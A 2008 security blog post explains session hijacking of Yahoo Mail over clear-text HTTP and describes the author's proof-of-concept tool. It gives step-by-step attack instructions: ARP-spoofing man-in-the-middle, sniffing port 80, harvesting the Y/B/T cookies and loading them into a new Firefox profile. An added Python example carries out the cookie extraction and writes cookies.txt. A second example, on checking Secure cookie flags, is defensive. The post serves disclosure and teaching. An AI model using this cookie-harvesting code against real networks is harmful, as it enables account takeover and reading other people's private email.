Clear text email insecurity (+ PoC)
Many people use publicly available email systems such as Yahoo Mail, Hotmail or Gmail over plain HTTP. In this post you will see how easy it is to take over someone's email session by exploiting the clear-text HTTP protocol. You can also find a tool I wrote, YM_hijack, which is a proof of concept of the theory described here.
A little bit of theory
Web servers identify a client through small pieces of data that the client sends along with every request, called cookies. After the client authenticates to the server (with its username and password), the server assigns that client unique cookie values. When the client later makes a request carrying those cookies, the server treats it as the authenticated user and lets it access that user's personal data. In other words, once you are logged in the cookie is the only proof of identity: whoever presents it is the user, as far as the server is concerned.
Most web-based email systems use the mechanism described above, and most of them do not encrypt their traffic after the login page. As you know, HTTP is a clear-text protocol, so anything sent over HTTP, the session cookies included, can be sniffed and read by anyone on the network path.
So, in a LAN environment, a sniffer plus a man-in-the-middle tool (ARP spoofing, for example, which makes the victim's traffic pass through your host even on a switched network) is enough to capture the cookies used for session identification and load them into your own browser to impersonate their real owner. I think the image below clarifies the scenario.
Proof of concept – the automatic way
YM_hijack is a tool that automates the process shown in the picture above. It must be run on the "Man in the Middle" host (see the picture). It has no MITM (man-in-the-middle) capabilities of its own, so to get into that position you must use another tool such as Cain, Ettercap, arpspoof or macof.
Prerequisites (for YM_hijack.exe): Windows XP, Mozilla Firefox (2 or above)
How does it work?
- Make yourself Man-in-the-middle
- Start YM_hijack.exe (or the Python version), which does the following:
- Sniff packets on the network destined for TCP port 80
- Extract the HTTP payload and search for the Yahoo Mail specific cookies (Y, B, T)
- Create a new Firefox profile named after the IP address of the originator
- Create the cookies.txt file in the newly created profile's folder
- Start a new instance of Firefox with the new profile
- Enter directly into the Yahoo Mail session of the 'poor guy'
You can find more details by studying the source code (if you read Python).
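The extraction and cookies.txt steps above, as an added example written for this page; it is not the YM_hijack source. Instead of sniffing, it walks over a constructed list of (source IP, TCP payload) pairs standing in for port-80 packets, keeps only requests that carry all three Yahoo cookies, and renders the Netscape cookies.txt format that Firefox 2 reads from a profile folder. The packet contents, IP addresses and cookie values are made up, and the assumption that the Y/B/T cookies belong to the parent domain (.yahoo.com) is ours, since a sniffed Cookie header carries no Domain attribute.

```python
"""Added example (not the YM_hijack source): pull the Yahoo Mail session
cookies out of sniffed HTTP requests and render a Netscape-format cookies.txt.
All packet contents below are constructed for the example, not a real capture."""
import os
import tempfile

# Names of the Yahoo Mail session cookies the post talks about.
YAHOO_COOKIE_NAMES = {"Y", "B", "T"}

# Constructed capture: (source IP, TCP payload of a request to port 80).
SAMPLE_CAPTURE = [
    ("192.168.1.23", b"GET /ym/ShowFolder?rb=Inbox HTTP/1.1\r\n"
                     b"Host: us.mg1.mail.yahoo.com\r\n"
                     b"User-Agent: Mozilla/5.0\r\n"
                     b"Cookie: B=EXAMPLE_B; Y=v=1&n=EXAMPLE_Y; T=z=EXAMPLE_T; ywadp=12345\r\n"
                     b"Connection: keep-alive\r\n\r\n"),
    # Another host on the LAN browsing an unrelated site: must be ignored.
    ("192.168.1.40", b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                     b"Cookie: sid=abc\r\n\r\n"),
    # A request from the victim with no Cookie header at all.
    ("192.168.1.23", b"GET /favicon.ico HTTP/1.1\r\nHost: mail.yahoo.com\r\n\r\n"),
]


def parse_request_headers(payload: bytes) -> dict:
    """Return the request headers as a dict with lower-cased names,
    or {} when the payload does not look like an HTTP request."""
    head = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    if not lines[0].startswith(("GET ", "POST ")):
        return {}
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_cookie_header(value: str) -> dict:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}; the first '=' separates name and value."""
    jar = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            jar[name.strip()] = val.strip()
    return jar


def extract_yahoo_session(payload: bytes):
    """Return (host, {name: value}) holding only the Y/B/T cookies, or None.
    Our choice: all three must be present, otherwise the session is not usable."""
    headers = parse_request_headers(payload)
    if "cookie" not in headers:
        return None
    session = {n: v for n, v in parse_cookie_header(headers["cookie"]).items()
               if n in YAHOO_COOKIE_NAMES}
    if len(session) < len(YAHOO_COOKIE_NAMES):
        return None
    return headers.get("host", ""), session


def registrable_domain(host: str) -> str:
    """'.yahoo.com' for 'us.mg1.mail.yahoo.com'.  Assumption: the stolen cookies
    were set for the parent domain, so Firefox must send them to every *.yahoo.com host."""
    labels = host.split(":")[0].lower().split(".")
    return "." + ".".join(labels[-2:])


def harvest(capture) -> dict:
    """Map each originator IP to (host, session cookies) for Yahoo Mail traffic."""
    sessions = {}
    for src_ip, payload in capture:
        found = extract_yahoo_session(payload)
        if found and src_ip not in sessions:
            sessions[src_ip] = found
    return sessions


def to_cookies_txt(domain: str, cookies: dict) -> str:
    """Render the Netscape cookies.txt format: seven tab-separated fields,
    domain / subdomain-flag / path / secure-only / expiry / name / value."""
    lines = ["# Netscape HTTP Cookie File"]
    flag = "TRUE" if domain.startswith(".") else "FALSE"
    expiry = "2147483647"   # far in the future: the stolen session never expires locally
    for name in sorted(cookies):
        lines.append("\t".join((domain, flag, "/", "FALSE", expiry, name, cookies[name])))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for src_ip, (host, cookies) in harvest(SAMPLE_CAPTURE).items():
        # One profile folder per originator, named after its IP, as the post describes.
        profile_dir = os.path.join(tempfile.mkdtemp(), src_ip)
        os.makedirs(profile_dir)
        with open(os.path.join(profile_dir, "cookies.txt"), "w") as fh:
            fh.write(to_cookies_txt(registrable_domain(host), cookies))
        print(f"{src_ip}: {sorted(cookies)} from {host} -> {profile_dir}/cookies.txt")
```

Running the file writes one cookies.txt per victim IP into a temporary profile folder; the real tool then points `firefox -profile <folder>` at it. The only packet that yields a session is the first one: the second host has no Yahoo cookies and the third request carries no Cookie header.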
How to protect yourself
- use HTTPS during the entire session (Gmail has an option to do that); keep in mind that this only helps if the session cookies are marked Secure, otherwise the browser still sends them in clear text whenever it loads any http:// page or image on the same domain
- encrypt your email content using PGP or a similar tool, so that even a hijacked session does not expose the messages themselves
Think twice before choosing an email service, especially for confidential information!
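To make the HTTPS advice concrete, here is an added example (written for this page, not part of the original post) that takes a Set-Cookie header from the mail server and decides whether the session cookie would still travel in clear text on a plain http:// request. The two headers are constructed: the weak one without the Secure flag, and the corrected one with Secure and HttpOnly. Expiry and the finer points of RFC 6265 domain and path matching are deliberately ignored.

```python
"""Added example (not from the post): would this session cookie be sent over
plain HTTP, where a sniffer sees it?  Headers below are constructed."""
from urllib.parse import urlsplit


def parse_set_cookie(header: str, set_by_host: str) -> dict:
    """Parse one Set-Cookie header.  A missing Domain attribute makes the
    cookie host-only, i.e. it is sent back only to set_by_host."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(), "secure": False,
              "httponly": False, "domain": set_by_host.lower(), "host_only": True,
              "path": "/"}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
        elif key == "domain" and val:
            cookie["domain"], cookie["host_only"] = val.lstrip(".").lower(), False
        elif key == "path" and val.startswith("/"):
            cookie["path"] = val
    return cookie


def would_be_sent(cookie: dict, url: str) -> bool:
    """Would a browser attach this cookie to a request for url?"""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if cookie["host_only"]:
        domain_ok = host == cookie["domain"]
    else:
        domain_ok = host == cookie["domain"] or host.endswith("." + cookie["domain"])
    path = u.path or "/"
    path_ok = path == cookie["path"] or path.startswith(cookie["path"].rstrip("/") + "/")
    scheme_ok = u.scheme == "https" or not cookie["secure"]
    return domain_ok and path_ok and scheme_ok


def sent_in_clear(cookie: dict, url: str) -> bool:
    """True when the cookie goes out on an unencrypted request.  HttpOnly does
    not matter here: it keeps scripts away from the cookie, not sniffers."""
    return urlsplit(url).scheme == "http" and would_be_sent(cookie, url)


# Constructed headers: the weak setting and the corrected one.
WEAK_COOKIE = "Y=v=1&n=EXAMPLE_Y; Domain=.yahoo.com; Path=/"
HARDENED_COOKIE = "Y=v=1&n=EXAMPLE_Y; Domain=.yahoo.com; Path=/; Secure; HttpOnly"
SETTER = "login.yahoo.com"
MAIL_URL = "http://us.mg1.mail.yahoo.com/ym/ShowFolder?rb=Inbox"

if __name__ == "__main__":
    for label, header in (("weak", WEAK_COOKIE), ("hardened", HARDENED_COOKIE)):
        c = parse_set_cookie(header, SETTER)
        print(f"{label}: sniffable on {MAIL_URL} -> {sent_in_clear(c, MAIL_URL)}")
```

The weak cookie is exposed as soon as the browser fetches anything over http:// from any *.yahoo.com host, even if the user logged in over HTTPS; the hardened one is never attached to an http:// request, so "use HTTPS during the entire session" actually holds.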
This entry was posted on September 5, 2008 at 12:55 pm and is filed under Tools (StormSecurity) with tags cleartext email, cookies, email hijack, yahoo mail, yahoo session hijack.